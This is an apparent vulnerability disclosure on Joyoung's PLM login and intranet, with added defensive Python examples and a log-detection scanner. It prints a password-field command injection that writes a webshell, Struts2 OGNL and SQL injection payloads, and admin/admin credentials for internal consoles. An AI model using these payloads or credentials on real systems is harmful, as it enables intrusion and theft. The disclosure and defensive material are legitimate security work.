Joyoung intranet roaming caused by a vulnerability (the password parameter also needs to be filtered)
Fix
Reference: this report builds on the earlier vulnerability http://wooyun.org/bugs/wooyun-2010-0141195
The account parameter has since been filtered; the password parameter is still not filtered.
POST /ease/App/index.php/Public/dologin HTTP/1.1
Host: plmyun.joyoung.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://plmyun.joyoung.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://plmyun.joyoung.com/ease/App/index.php/Public/login
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=gbm15fsjqg8gc7s6ovtdm2uqo6

account=123&password=123%22%26echo '' > /var/www/cgi-bin/yo.php%26ifconfig%22&wdsl=adw&__hash__=c800b1c5f9c095e463c5fc8c1e4de4d3_15b9ecc9113266ac29e34a08bf0b87b5
The new version of Caidao (the "kitchen knife" client) can be used; the old version does not support HTTPS.
Tunnel: HTTP reverse tunnel
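The request above works because the login handler hands the password to a shell, so a quote and `&` in the value end the intended command and start new ones. The following is an added example, not code from the original report or from the Joyoung application: `check_password` is a hypothetical helper binary, and the sample password is a constructed value with the same shape as the one in the request. It contrasts the shell-interpolating pattern with an argument vector, which is the fix that actually removes the problem, and shows why character filtering alone is only a secondary control.

```python
"""Added example (not from the original report): why an interpolated password
becomes a command, and the argv form that prevents it.  `check_password` is a
hypothetical helper; INJECTED_PASSWORD is a constructed sample value."""
import re
import shlex
import subprocess

# Constructed sample with the same shape as the decoded password in the request.
INJECTED_PASSWORD = '123"&echo \'\' > /tmp/example.php&ifconfig"'


def vulnerable_command(account: str, password: str) -> str:
    """Builds the command string a shell-interpolating handler would run.
    The closing quote and '&' in the password terminate the argument and the
    shell then executes the rest as further commands.  Never executed here."""
    return f'check_password "{account}" "{password}"'


def safe_argv(account: str, password: str) -> list[str]:
    """Argument vector: every value is exactly one argv entry; no shell parses it."""
    return ["check_password", account, password]


def safe_shell_string(account: str, password: str) -> str:
    """If a shell string is unavoidable, quote each operand with shlex.quote."""
    return "check_password " + " ".join(shlex.quote(v) for v in (account, password))


def parse_shell_string(command: str) -> list[str]:
    """POSIX-style tokenisation, used to show that quoted operands round-trip."""
    return shlex.split(command)


# Defence in depth only: this rejects legitimate passwords that contain '&' or
# quotes, so it must not be the only control.
SHELL_META = re.compile(r'[;&|`$<>\n"\'\\]')


def looks_like_shell_injection(value: str) -> bool:
    return SHELL_META.search(value) is not None


def echo_argument(value: str) -> str:
    """Demonstrates argv passing: /bin/echo receives the value as one literal
    argument, so the embedded '&' and '>' are printed, not interpreted."""
    out = subprocess.run(["echo", value], capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    print("interpolated:", vulnerable_command("123", INJECTED_PASSWORD))
    print("argv:        ", safe_argv("123", INJECTED_PASSWORD))
    print("quoted:      ", safe_shell_string("123", INJECTED_PASSWORD))
    print("echo sees:   ", echo_argument(INJECTED_PASSWORD))
```

The argv form is the change to make in the handler; the quoting form is the fallback when a shell string cannot be avoided. The metacharacter check is what "filtering the password" amounts to, and the comment notes its cost: it turns away valid passwords, which is why it should sit behind the argv fix rather than replace it.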
First, access some internal systems.
#1
http://**.**.**/Systeminfo?Vendor=CITRIX&licenseTab=&selected=
Virtualization management console with the weak password admin/admin.
#2
https://172.31.1.120/appliance-overview.php
admin/admin
Avocent KVM
Product description: the MergePoint Unity switch integrates KVM over IP and serial console management technology in a single device. This lets IT administrators access and control servers, network devices and other equipment in data centers and branch offices, giving complete remote management of those devices.
#3
Target: http://**.**.**/ExecuteSQLFileAction.action
whoami: nt authority\system
WebPath: C:\tomcat\defalut\webapps\ROOT
os.name: Windows 2003
os.version: 5.2
java.home: C:\Program Files\Java\jdk1.6.0_17\jre
java.version: 1.6.0_17
os.arch: x86
user.name: SYSTEM
user.home: C:\Documents and Settings\Default User
user.dir: C:\WINDOWS\system32
java.class.path: C:\tomcat\defalut\bin\bootstrap.jar
java.io.tmpdir: C:\tomcat\defalut\temp
#4
http://**.**.**/Jy_admin/security!Login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%2F%22%22%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
(Struts2 OGNL expression injection via the redirect: prefix; the expression writes the web root path returned by getRealPath into the response.)
#5
http://**.**.**/Default.aspx (O&M information platform)
SQL injection with 1' or '1'='1
123456
Error-based injection returning the first password from the Users table:
http://172.31.0.111/Web/Users/login.asp' and 1=convert(int,(select top 1 Password from Users)) -- 'or'1'='1 09126970585
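The two injections in #5 both rely on the login page concatenating user input into its SQL. The following added example (not code from the report or from the affected ASP application) reproduces the `1' or '1'='1` bypass against a string-built query and shows that the same input is harmless once the query is parameterized. It uses an in-memory SQLite table with constructed rows in place of the MS SQL Server the report targets; the `Users` table name and columns are assumed from the `select top 1 Password from Users` probe on the page.

```python
"""Added example (not from the original report): string-built versus
parameterized login queries.  The Users table and its rows are constructed
sample data; SQLite stands in for the MS SQL Server seen on the page."""
import sqlite3

# The exact input shown in the report for the login bypass.
INJECTION = "1' or '1'='1"


def make_db() -> sqlite3.Connection:
    """Constructed sample table mirroring the Users(Username, Password) schema
    implied by the page's probe.  Plaintext here only to mirror the finding;
    a real fix also stores password hashes, so nothing usable can be read out."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [("admin", "SAMPLE-PW-1"), ("ops", "SAMPLE-PW-2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Concatenates input into SQL.  With INJECTION in both fields the WHERE
    clause becomes  Username='1' or '1'='1' AND Password='1' or '1'='1',
    which is true for every row, so the check passes with no valid credential."""
    sql = (
        f"SELECT COUNT(*) FROM Users WHERE Username='{username}' "
        f"AND Password='{password}'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the quotes in the input are data, never SQL syntax, so
    the comparison is made against the literal string "1' or '1'='1"."""
    sql = "SELECT COUNT(*) FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected:", login_vulnerable(db, INJECTION, INJECTION))
    print("safe, injected:      ", login_safe(db, INJECTION, INJECTION))
    print("safe, real creds:    ", login_safe(db, "admin", "SAMPLE-PW-1"))
```

The `convert(int, (select top 1 Password ...))` probe in the report only yields a usable value because the column stores passwords in clear text; parameterizing the query closes the injection, and hashing the stored passwords is the separate change that limits what an error message can leak if another injection is found later.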
Solution:
1. Fix the command execution at the entry point (filter the password parameter as well as the account parameter).
2. Fix the common intranet vulnerabilities: SQL injection and Struts2 command execution.
3. Change the default passwords on the various devices.
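While the three fixes above are rolled out, the same three request shapes can be picked out of web logs to see whether they are still being tried. The following is an added example, not part of the report: a small triage check over constructed log lines in an assumed "<method> <path-with-query> <form-body-or-->" format (a reverse proxy that records form bodies; the site's actual log format is not shown on the page). The patterns are keyed to the command-injection form, the Struts2 `redirect:${...}` URL and the SQL probes seen earlier, and are a starting point for review, not a WAF rule set.

```python
"""Added example (not from the original report): flag the three request
shapes from this report in request logs.  Log lines and the log format are
constructed assumptions; the patterns are deliberately narrow."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines: "<method> <path-with-query> <form-body-or-->".
SAMPLE_LOG = [
    # command injection in the password field (same shape as the report's request)
    "POST /ease/App/index.php/Public/dologin account=123&password=123%22%26echo%20%27%27%20%3E%20/tmp/example.php%26ifconfig%22",
    # Struts2 OGNL via the redirect: prefix (shortened form of the report's URL)
    "GET /Jy_admin/security!Login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%7D -",
    # error-based SQL injection probe against the ASP login
    "GET /Web/Users/login.asp?user=admin%27%20and%201%3Dconvert(int,(select%20top%201%20Password%20from%20Users))--%20%27or%271%27%3D%271 -",
    # benign login whose password legitimately contains '&'
    "POST /ease/App/index.php/Public/dologin account=alice&password=Tr0ub4dor%263",
    # benign request to the virtualization console page
    "GET /Systeminfo?Vendor=CITRIX&licenseTab=&selected= -",
]

# A metacharacter followed by a command name, or a redirect into an absolute
# path; a bare '&' is not enough, because passwords may contain one.
SHELL_CMDS = r"(echo|cat|id|whoami|ifconfig|ipconfig|wget|curl|nc|bash|sh|cmd|powershell|ping)"
PATTERNS = {
    "shell-injection": re.compile(r"[;&|`]\s*" + SHELL_CMDS + r"\b|\$\(|>\s*/\w", re.I),
    "struts-ognl": re.compile(
        r"\b(redirect|redirectAction|action):\$\{|#context\.get|xwork2\.dispatcher|@java\.lang\.",
        re.I,
    ),
    "sql-injection": re.compile(
        r"'\s*(or|and)\s*'?\w*'?\s*=|convert\s*\(\s*int|select\s+top\s+\d+|--\s*'",
        re.I,
    ),
}


def decode_request(line: str) -> str:
    """Split a line into method, target and body, URL-decoding target and body
    once so that %26 / %27 / %23 are inspected as the characters they encode."""
    method, target, body = (line.split(" ", 2) + ["-"])[:3]
    return f"{method} {unquote_plus(target)} {unquote_plus(body)}"


def classify(line: str) -> list[str]:
    """Names of the vectors whose pattern matches the decoded request."""
    decoded = decode_request(line)
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]


def scan(lines) -> dict[int, list[str]]:
    """1-based line number -> matched vector names, for flagged lines only."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := classify(line))}


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
```

Decoding before matching matters: the report's payloads arrive percent-encoded, so `%23context` or `%27%20or` would slip past patterns written against the raw line. The fourth sample line is there to show that a password containing `&` is not flagged by itself, which is also why the real fix for #1 is to keep the password out of the shell rather than to reject characters.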